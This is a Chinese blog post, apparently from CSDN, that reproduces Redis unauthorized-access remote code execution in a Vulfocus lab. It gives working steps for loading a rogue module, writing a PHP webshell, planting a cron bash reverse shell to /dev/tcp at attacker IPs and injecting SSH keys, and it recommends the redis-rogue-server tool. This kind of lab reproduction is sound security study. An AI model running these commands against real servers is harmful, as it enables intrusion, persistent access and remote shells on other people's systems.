Redis未授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557

最新推荐文章于 2024-06-10 22:19:57 发布
最新推荐文章于 2024-06-10 22:19:57 发布
阅读量1.4k 收藏 19
点赞数 31
分类专栏: 漏洞复现 文章标签: redis 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MateSnake/article/details/139012023
版权

CNVD-2019-21763

漏洞描述

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。

漏洞复现

靶场环境

利用Vulfocus进行搭建,可以使用在线,也可以使用自己搭建。
Vulfocus在线网址

https://vulfocus.cn/#/dashboard

开启靶场

我这使用是在线Vulfocus环境开启的靶场
image.png

使用工具

https://github.com/vulhub/redis-rogue-getshell

下载好工具放到kali中,kali需要有python3的环境
解压后先进入到 RedisModulesSDK目录里面的exp目录下,make编译一下才会产生exp.so文件,后面再利用这个exp.so文件进行远程代码执行

//解压
unzip redis-rogue-getshell-master.zip

//进入目录
cd redis-rogue-getshell-master/RedisModulesSDK/exp/

//编译
make

//回到项目根目录
cd ../../

exp命令

python redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 攻击IP的端口号 -f RedisModulesSDK/exp/exp.so -c "id"

python redis-master.py -r 123.58.224.8 -p 13647 -L 120.26.87.25 -P 9999 -f RedisModulesSDK/exp/exp.so -c "id"

image.png

CNVD-2015-07557

启动靶场

我用的是自己搭建的Vulfocu环境开启的靶场

image.png

方法一

写Webshell需得到Web路径,引起webshell的连接操作,得到权限。

利用条件

Web目录权限可读写,有web网站,不然连接不了

config set dir /tmp            #设置WEB写入目录
 
config set dbfilename 1.php    #设置写入文件名
 
set test "<?php phpinfo();?>"  #设置写入文件代码
 
bgsave                         #保存执行
 
save                           #保存执行

复现

Redis图形化工具连接
image.png

image.png

写命令,这里写的是1.php,因为网站是php语言,如果是jsp语言就改成1.jsp

config set dir /tmp            #设置WEB写入目录
 
config set dbfilename 1.php    #设置写入文件名
 
set test "<?php phpinfo();?>"  #设置写入文件代码
 
bgsave                         #保存执行
 
save                           #保存执行

image.png

来服务器上看看有没有成功
image.png

方法二

向计划任务里面写文件,实现执行

set yy "\n\n\n* * * * * bash -i >& /dev/tcp/10.8.0.6/5555 0>&1\n\n\n"

实现反弹shell

利用条件

Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态,条件难满足

config set dir /var/spool/mail
set yy "\n\n\n* * * * * bash -i >& /dev/tcp/122.51.213.244/9999 0>&1\n\n\n"
config set dbfilename x
save

注意:centos系统会忽略乱码去执行格式正确的任务计划
而ubuntu系统并不会忽略这些乱码,所以导致命令执行失败
image.png

方法三

写入Linux ssh-key公钥
自己攻击机把密匙文件生成出来,密匙文件写到目标机器上面,再用攻击机连接目标机器就不用输入账号密码了

利用条件

Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态
允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

ssh-keygen -t rsa
 
cd /root/.ssh/
 
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
 
cat key.txt | redis-cli -h 目标IP -x set xxx
 
//以上步骤在自己的攻击机器上执行
 
config set dir /root/.ssh/
 
config set dbfilename authorized_keys
 
save
 
cd /root/.ssh/
 
ssh -i id_rsa root@目标IP

自动化项目

集成上面三个测试方式 ,实战直接上这个工具就好了

https://github.com/n0b0dyCN/redis-rogue-server

python redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击机的IP --lport 攻击机的端口

image.png

复现演示

python redis-rogue-server.py --rhost 10.8.0.1 --rport 18790 --lhost 10.8.0.6

image.png

交互shell

image.png

反弹shell
python redis-rogue-server.py --rhost 目标ip --rport 目标端口 --lhost 攻击IP --lprot 攻击端口

image.png

注意

只做学习研究,禁止做违法的事情,任何后果与本人无关!

Manba_77
关注
  • 31
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis 授权访问 (CNVD-2019-21763)
qq_32445755的博客
10-03 952
近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。CNVD-2015-07557也可以复现
漏洞复现redis授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 1122
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
cnvd_2015_07557-redis授权访问rce漏洞复现-vulfocus复现
最新发布
c0529的博客
06-10 725
python3 redis-master.py -r 目的ip -p 目的端口 -L 47.100.167.248 -P 1111 -f RedisModulesSDK/exp.so -c "id"python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"出了一个file,搜了一下是由于这个文件用python3写的,要检查一下你的服务器上是不是python版本3.0以上,用。
redis授权访问-cnvd 2015-0755漏洞复现
weixin_53747497的博客
02-04 763
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
Redis授权访问-CNVD-2019-21763复现
XXokok的博客
11-25 374
Redis授权访问-CNVD-2019-21763复现
VULFOCUS-redis授权访问CNVD-2019-21763
HAKUNAMATATATTA的博客
11-30 2700
redis授权访问,主从复制RCE
Redis授权访问漏洞复现
热门推荐
马赛克的博客
04-10 1万+
一:漏洞简介和危害 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上; 如果没有设置密码认证(一般为空)的情况下,会导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。 攻击者访问之后,利用Redis自身提供的config命令,可以进行写文件操作 可以成功把...
redis授权访问漏洞复现
findou
04-09 453
Redis是一个开源的key-value内存中的数据结构存储系统,可以用作缓存,或数据库redis因为配置不当可以导致授权访问redis的默认端口是6379,并且redis默认配置没有密码认证,如果reids服务暴露在公网上会导致攻击者在授权的情况下访问redis。如果redis以root身份运行,攻击者可以给root账号写入ssh公钥文件,通过ssh登录目标主机。下面是redis授权访...
授权访问漏洞
snowy_y的博客
06-23 915
授权访问
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 951
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Redis漏洞总结--授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)
weixin_74985952的博客
09-22 1060
由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。对于Redis服务的授权访问,首先需要确认Redis授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即授权漏洞存在。漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。注意:部分没目录权限读写权限。
redis-CNVD-2015-07557
m0_51369969的博客
07-13 807
redis设计缺陷,导致服务器被添加账号用于ssh远程登录
Redis授权访问漏洞
Kevin's Blog
06-11 865
一、写入WebShell 1.1 适用系统 Windows Linux 1.2 利用前提 Redis可扫到开放端口(对公网开放/渗透到内网环境) 没有设置IP访问限制,默认没有设置密码(在内网中很常见,公网基本绝迹) 可以知道web目录执行的绝对路径 存在写入权限 写入的动态脚本文件能够被执行 1.3 利用过程 》》可以通过站点报错拿到web路径 (这里略了,仅演示具体的操作) 》》使用redis客户端连入对方redis redis-cli -h <target-ip> 》》使用Redi
redis漏洞修复:(CNVD-2019-21763
大新新大浩浩的博客
09-22 928
redis漏洞修复:(CNVD-2019-21763) docker形式运行的redis的防火墙规则配置
【Vulfocus漏洞复现redis-cnvd_2019_21763redis-cnvd_2015_07557
weixin_45632448的博客
04-02 3895
vps:腾讯云 centos8 本地:windows11 靶场环境:http://123.58.236.76:47109/ 在vps上执行以下命令 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand cd RedisModules-ExecuteCommand/ make 编译之后继续执行命令 git clone https://github.com/Ridter/redis-rce.git cd redis-rce/
redis授权访问(cnvd_2019_21763)
qq_14902381的博客
08-12 2400
redis授权访问漏洞,(cnvd_2019_21763)
Redis授权访问漏洞复现(三种方式)
m0_67393619的博客
08-24 657
要开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限(我们可以将dir设置为一个目录A,而dbfilename为文件名B,再执行save或bgsave,则我们就可以写入一个路径为/A/B的任意文件。因为我此时在的路径里只有1.txt,没有redis服务,所以在管道符后面补充了redis所在的路径成功。# 这里试了很多次一直出现下图错误,手打一遍才成功,有如下问题的,可以试一试。连接目标服务器上的Redis服务,将保存的公钥1.txt写入Redis
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值